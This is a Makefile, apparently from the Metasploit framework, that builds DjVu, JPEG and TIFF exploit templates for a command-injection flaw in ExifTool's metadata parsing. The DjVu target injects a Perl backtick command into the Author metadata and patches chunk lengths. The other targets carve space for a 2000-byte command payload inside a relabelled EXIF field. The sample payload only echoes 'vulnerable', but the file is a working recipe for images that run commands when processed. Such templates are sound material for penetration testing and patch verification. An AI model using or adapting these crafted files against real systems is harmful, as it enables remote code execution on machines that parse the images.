38 lines
1.7 KiB
Makefile
38 lines
1.7 KiB
Makefile
.PHONY: all clean msf.djvu msf.jpg msf.tif
|
|
|
|
all: msf.djvu msf.jpg msf.tif
|
|
|
|
clean:
|
|
rm -f msf.djvu msf.jpg msf.tif
|
|
|
|
msf.djvu:
|
|
curl -L https://github.com/exiftool/exiftool/raw/ca8685788f5763c547349f239764bd19cf1952da/t/images/DjVu.djvu -o $@
|
|
djvused -f set_author.dsed -s $@
|
|
# Rewrite the ANT section as uncompressed data with an 'echo vulnerable' payload
|
|
perl -0777 -pi -e 's!DJVIANTz.*!DJVIANTa\x00\x00\x00\x39(metadata (Author "\\c\@{[`echo vulnerable > /dev/tty`]}"))!s;' msf.djvu
|
|
# Fix up some length fields
|
|
perl -e 'print "\x00\x00\x00\xeb"' | dd of=$@ bs=1 seek=8 count=4 conv=notrunc
|
|
perl -e 'print "\x00\x00\x00\x45"' | dd of=$@ bs=1 seek=174 count=4 conv=notrunc
|
|
# Test the file
|
|
djvudump $@
|
|
|
|
msf.jpg:
|
|
curl -L https://github.com/exiftool/exiftool/raw/a2500333f845b303b86013110651d219e193d3eb/t/images/Writer.jpg -o $@
|
|
# Scrub the file
|
|
exiftool -overwrite_original -all= $@
|
|
# Create a cave big enough for the djvu template plus a 2000 byte CMD payload
|
|
exiftool -overwrite_original -processingsoftware=$$(perl -e 'print "z"x2221') $@
|
|
# Change the 'Processing Software' field to a HasselbladExif field
|
|
sed -i 's/\x00\x0b/\xc5\x1b/' $@
|
|
|
|
msf.tif:
|
|
curl -L https://github.com/exiftool/exiftool/raw/a2500333f845b303b86013110651d219e193d3eb/t/images/ExifTool.tif -o $@
|
|
# Scrub the file
|
|
exiftool -overwrite_original -all= $@
|
|
# Selectively scrub IFD0 fields
|
|
exiftool -overwrite_original -ImageDescription= -Make= -Model= -Software= -ModifyDate= $@
|
|
# Create a cave big enough for the djvu template plus a 2000 byte CMD payload
|
|
exiftool -overwrite_original -processingsoftware=$$(perl -e 'print "z"x2221') $@
|
|
# Change the 'Processing Software' field to a HasselbladExif field
|
|
sed -i 's/\x00\x0b/\xc5\x1b/' $@
|